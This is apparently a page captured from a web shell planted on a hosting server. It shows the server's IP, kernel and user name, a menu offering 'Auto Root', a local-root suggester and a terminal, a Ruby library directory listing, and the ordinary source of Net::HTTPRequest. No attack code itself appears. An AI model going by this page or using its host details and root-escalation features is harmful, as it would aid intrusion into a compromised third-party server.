Linux server.edchosting.com 4.18.0-553.79.1.lve.el7h.x86_64 #1 SMP Wed Oct 15 16:34:46 UTC 2025 x86_64
LiteSpeed
Server IP : 75.98.162.185 & Your IP : 216.73.216.163
Domains :
Cant Read [ /etc/named.conf ]
User : goons4good
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby20 /
lib64 /
ruby /
2.0.0 /
net /
http /
Delete
Unzip
Name
Size
Permission
Date
Action
backward.rb
578
B
-rw-r--r--
2012-08-23 18:42
exceptions.rb
710
B
-rw-r--r--
2012-05-22 16:36
generic_request.rb
9.04
KB
-rw-r--r--
2013-02-14 10:51
header.rb
14.36
KB
-rw-r--r--
2012-05-23 09:09
proxy_delta.rb
241
B
-rw-r--r--
2012-05-22 16:36
request.rb
715
B
-rw-r--r--
2012-07-19 18:43
requests.rb
2.88
KB
-rw-r--r--
2012-05-22 16:36
response.rb
9.78
KB
-rw-r--r--
2015-01-14 02:32
responses.rb
8.42
KB
-rw-r--r--
2012-07-04 23:31
Save
Rename
# HTTP request class. # This class wraps together the request header and the request path. # You cannot use this class directly. Instead, you should use one of its # subclasses: Net::HTTP::Get, Net::HTTP::Post, Net::HTTP::Head. # class Net::HTTPRequest < Net::HTTPGenericRequest # Creates an HTTP request object for +path+. # # +initheader+ are the default headers to use. Net::HTTP adds # Accept-Encoding to enable compression of the response body unless # Accept-Encoding or Range are supplied in +initheader+. def initialize(path, initheader = nil) super self.class::METHOD, self.class::REQUEST_HAS_BODY, self.class::RESPONSE_HAS_BODY, path, initheader end end